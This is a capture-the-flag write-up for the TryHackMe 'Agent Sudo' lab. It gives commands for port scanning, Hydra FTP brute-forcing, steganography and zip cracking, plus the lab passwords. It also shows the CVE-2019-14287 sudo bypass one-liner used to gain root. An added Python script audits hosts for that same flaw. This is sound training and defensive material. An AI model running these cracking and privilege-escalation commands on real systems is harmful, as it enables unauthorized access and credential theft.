Agent Sudo — TryHackMe — Writeup
Hello. I’m Rahmos. Here is my Agent Sudo TryHackMe writeup. Check it out!
TASK 2
First, let’s run nmap to check for open ports on this device.
nmap -Pn -T5 -vv <ip>
There are 3 open ports. So:
#1 3 is ans for question 1
An Apache web server is active under this device. So let’s access its webpage.
So we need the right user-agent to access the site. Looking at the hint, we know that the right user agent is “C”.
#2 user-agent is ans for question 2
Let’s change the user agent by any method you want. I will use the dev tool to do it. After changing the user-agent to “C”, now we can read the content.
So, we know this user’s name is Chris, and also one more important piece of information: a weak password!
#3 chris is ans for question 3
TASK 3
Now we know the user name, let’s crack his password using Hydra.
hydra -l chris -P /your-wordlist-path ftp://<ip>
Now we know the password is: ******
Enter that password to question #1
Now let’s ftp to the machine.
Successful! Let’s try a command to list the files. Error! So we need to enter passive mode.
Type passive and press Enter.
Here we go! We see there are 3 files within that directory. Let’s cat the content of the txt file.
get To_agentJ.txt -
- Specifying “-” at the end prints the file directly to the terminal, so there is no need to download it to our machine.
So now we know that the password for agent J is stored inside 1 of these 2 photos.
Let’s download both photos to our machine.
mget cute-alien.jpg cutie.png
Let’s look at the metadata. I will use Jeffrey Friedl’s image exif.
Nothing useful. So let’s try steghide to extract hidden data inside this photo.
steghide --extract -sf /path-to-cutie.png
Note that steghide cannot be used with .png format images, so let’s try cute-alien.jpg.
First of all, we need to crack the steghide password of this image. I’m using stegcracker. You can download it here: https://github.com/Paradoxis/StegCracker
stegcracker /path-to-cute-alien.jpg
By default, it will use the rockyou.txt wordlist, or you can choose your own wordlist by specifying the -w flag.
Cracked successfully! So the steg password is “area51” and you can see the secret content at /path-to-cute-alien.jpg.out
#3 area51 is ans for question 3
Let’s see the secret message.
cat /path-to-cute-alien.jpg.out
So, now we know that agent J is “james” and his password is “hackerrules!”
#4 james is ans for question 4
#5 hackerrules! is ans for question 5
However, there is also a “zip” password question left! So I think it’s hidden in cutie.png. Let’s find out with binwalk.
binwalk /path-to-cutie.png -e
Here we go! There is an 8702.zip in this image. Let’s crack this zip’s password using john.
zip2john /path-to-8702.zip > output.txt
john --wordlist=/path-to-wordlist output.txt
After john has cracked the password, type:
john --show output.txt
So the password is “alien”.
#2 alien is ans for question 2
Now ssh to the machine!
TASK 4
sshpass -p hackerrules! ssh james@<ip>
#1 Here we got the flag for question 1
Now let’s copy the photo to our machine using scp. In your machine terminal (not the ssh terminal), type:
scp james@<ip>:/home/james/Alien_autospy.jpg /destination-path
Here we got the image. Let’s find some information about this image using reverse image search. The hint says “Foxnews”, so let’s find anything related to Foxnews with this image.
Finally we found the answer.
#2 Roswell alien autopsy is the ans for question 2
TASK 5
Let’s find a way to get root!
First, try sudo -l to see which commands James can run as root.
Unfortunately, we cannot run any commands as root on this machine. So let’s try another way: find the version of sudo and search for an exploit.
sudo -V
Sudo is running as version 1.8.21p2. Search for this version’s exploit and we’re led to a CVE.
https://www.cybersecurity-help.cz/vdb/SB2019101501
#1 CVE-2019-14287 is ans for question 1
Now run the exact command to get root!
sudo -u#-1 bash -u
Now, I’m root! cat root.txt to see the flag.
Now we see the root flag and also the Agent R’s real name: DesKel
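From the defender's side, the sudo version check above can be turned into an audit. The following is an added example, not part of the original writeup: it flags a host when `sudo -V` reports a version older than 1.8.28 (the upstream release that fixes CVE-2019-14287) and the sudoers policy has a Runas list that combines ALL with a negated user, which is the only kind of rule the bug affects. The function names and the sample sudoers text (user "alice") are constructed for illustration.

```python
import re

FIXED_IN = (1, 8, 28)  # upstream release that fixes CVE-2019-14287

def parse_sudo_version(sudo_v_output):
    """Extract (major, minor, patch) from `sudo -V` output; the pN suffix is ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", sudo_v_output)
    if m is None:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(part) for part in m.groups())

def risky_runas_rules(sudoers_text):
    """Return rules whose Runas user list combines ALL with a negated entry.

    Only such rules are affected: the bug lets '-u#-1' slip past the '!root'
    exclusion. Runas_Alias indirection is not resolved by this sketch.
    """
    hits = []
    for raw in sudoers_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):      # comments and #include lines
            continue
        for spec in re.findall(r"\(([^)]*)\)", line):
            users = [u.strip() for u in spec.split(":")[0].split(",")]
            if "ALL" in users and any(u.startswith("!") for u in users):
                hits.append(line)
                break
    return hits

def is_exposed(sudo_v_output, sudoers_text):
    """True when the upstream version predates the fix AND a risky rule exists.

    Distributions backport fixes without changing the upstream version string,
    so treat a True result as a prompt to check the package changelog.
    """
    old = parse_sudo_version(sudo_v_output) < FIXED_IN
    return old and bool(risky_runas_rules(sudoers_text))

# Constructed sample input (hypothetical user "alice"), not taken from the room.
SAMPLE_SUDOERS = """\
# constructed sudoers sample
root ALL=(ALL:ALL) ALL
alice ALL=(ALL, !root) /bin/bash
%admin ALL=(ALL) ALL
"""

if __name__ == "__main__":
    print(is_exposed("Sudo version 1.8.21p2", SAMPLE_SUDOERS))
    print(risky_runas_rules(SAMPLE_SUDOERS))
```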
The end.